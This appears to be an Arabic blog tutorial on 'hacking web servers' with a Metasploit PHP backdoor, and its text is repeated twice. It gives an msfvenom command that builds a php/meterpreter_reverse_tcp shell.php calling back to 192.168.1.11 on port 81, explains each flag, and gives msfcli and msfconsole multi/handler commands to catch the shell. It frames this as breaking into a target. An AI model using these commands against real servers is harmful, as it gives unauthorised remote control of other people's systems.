إختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP

advertisements

Tweet

كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية  اليوم باذن الله راح نتكلم  عن أختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP مستلزمات لتطبيق على جهازك :  Apache2 Php shell Metasploit امر تنصيب Apache : sudo apt-get install apache2 لقرائة PHP على السرفر : sudo apt-get install libapache2-mod-php5 تصريح ملف PHP : chmod 644 file.php الأن نمر مباشرة الى تريمنال ونكتب امر تالي  msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.11 LPORT=81 -f raw > shell.php شرح اوامر :  P: تعني بايلود LHOST : عنوان ايبي الخاص بك سواء الخارجي او داخلي  LPORT: بورت الذي ستصل عليه البايلود F Raw : Format Raw  البايلود الذي اخترناه بعد استغلال يقوم باتصال بجهازنا على بورت المحدد فوق ,  ملاحظة : يجب اظافة وسوم بي اتش بي للباكدور RAW FORMAT <? php ?> وبعدها نكتب امر تالي :  msfcli multi/handler LHOST=192.168.1.11 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E E: exploit طيب امر واضح شغلنا سكريبت msfcli لتسريع امر شوي طبعا هذا السكريبت يستعمل  عموما في عمل شروحات يعني غير صالح لو حبيت تخترق حقيقة الهدف ,,, ﻻزمك تفتح تريمنال.  لذلك في حالة وجود المشاكيل نقوم بانتقال الى طريقة المعتادة msfconsole use multi/handler set payload php/meterpreter_reverse_tcp set lhost 192.168.1.11 set lport 81  exploit  تطبيق الشرح :

كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية 

اليوم باذن الله راح نتكلم 

عن أختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP

مستلزمات لتطبيق على جهازك : 

Apache2

Php shell

Metasploit

امر تنصيب Apache :

sudo apt-get install apache2

لقرائة PHP على السرفر :

sudo apt-get install libapache2-mod-php5

تصريح ملف PHP :

chmod 644 file.php

الأن نمر مباشرة الى تريمنال ونكتب امر تالي 

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.11 LPORT=81 -f raw > shell.php

شرح اوامر : 

P: تعني بايلود

LHOST : عنوان ايبي الخاص بك سواء الخارجي او داخلي 

LPORT: بورت الذي ستصل عليه البايلود

F Raw : Format Raw 

البايلود الذي اخترناه بعد استغلال يقوم باتصال بجهازنا على بورت المحدد فوق , 

ملاحظة : يجب اظافة وسوم بي اتش بي للباكدور RAW FORMAT

<? php ?>

وبعدها نكتب امر تالي : 

msfcli multi/handler LHOST=192.168.1.11 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E

E: exploit

طيب امر واضح شغلنا سكريبت msfcli لتسريع امر شوي طبعا هذا السكريبت يستعمل 

عموما في عمل شروحات يعني

غير صالح لو حبيت تخترق حقيقة الهدف ,,, ﻻزمك تفتح تريمنال. 

لذلك في حالة وجود المشاكيل نقوم بانتقال الى طريقة المعتادة

msfconsole

use multi/handler

set payload php/meterpreter_reverse_tcp

set lhost 192.168.1.11

set lport 81 

exploit 

تطبيق الشرح :